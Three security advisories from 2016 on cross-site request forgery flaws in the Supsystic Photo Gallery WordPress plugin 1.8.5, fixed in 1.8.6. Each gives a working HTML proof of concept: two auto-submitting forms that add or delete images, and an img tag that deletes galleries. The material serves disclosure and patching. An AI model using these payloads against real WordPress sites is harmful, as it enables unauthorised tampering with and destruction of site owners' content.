WordPress Photo Gallery 1.8.5 Cross Site Request Forgery

------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
adding of images
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to add images to a gallery.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_adding_of_images.html

This issue exists because Photo Gallery lacks protection against Cross-Site Request Forgery attacks. Due to this, it is possible to add images to a gallery. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Proof of concept

<html>
   <body>
      <form method="post" action="http://<target>/wp-admin/admin-ajax.php">
         <input type="hidden" name="action" value="grid-gallery">
         <input type="hidden" name="galleryId" value="5">
         <input type="hidden" name="attachType" value="gallery">
         <input type="hidden" name="folder_id" value="0">
         <input type="hidden" name="attachment_id" value="10">
         <input type="hidden" name="route[module]" value="photos">
         <input type="hidden" name="route[action]" value="add">
      </form>
      <script>
         document.forms[0].submit();
      </script>
   </body>
</html>


------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
deleting of galleries
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to delete arbitrary gallleries.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_deleting_of_galleries.html

This issue exists because Photo Gallery lacks protection against Cross-Site Request Forgery attacks. Due to this, it is possible to delete arbitrary gallleries. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Proof of concept

<html>
   <body>
      <img src="http://<target>/wp-admin/admin.php?page=supsystic-gallery&module=galleries&action=delete&gallery_id=10 ">
   </body>
</html>

------------------------------------------------------------------------
Cross-Site Request Forgery in Photo Gallery WordPress Plugin allows
deleting of images
------------------------------------------------------------------------
Umit Aksu, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Photo
Gallery by Supsystic WordPress Plugin. This issue can be used by an
attacker to delete arbitrary images from the Photo Gallery.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Photo Gallery by Supsystic
WordPress Plugin version 1.8.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Photo Gallery by Supsystic version 1.8.6.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_photo_gallery_wordpress_plugin_allows_deleting_of_images.html

This issue exists because Photo Gallery lacks protection against Cross-Site Request Forgery attacks. Due to this, it is possible to delete images from an existing gallery. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Proof of concept

<html>
   <body>
      <form method="post" action="http://192.168.1.18/wp-admin/admin-ajax.php">
         <input type="hidden" name="action" value="grid-gallery">
         <input type="hidden" name="gallery_id" value="2">
         <input type="hidden" name="ids[]" value="5">
         <input type="hidden" name="ids[]" value="7">
         <input type="hidden" name="route[module]" value="galleries">
         <input type="hidden" name="route[action]" value="deleteResource">
      </form>
      <script>
         document.forms[0].submit();
      </script>
   </body>
</html>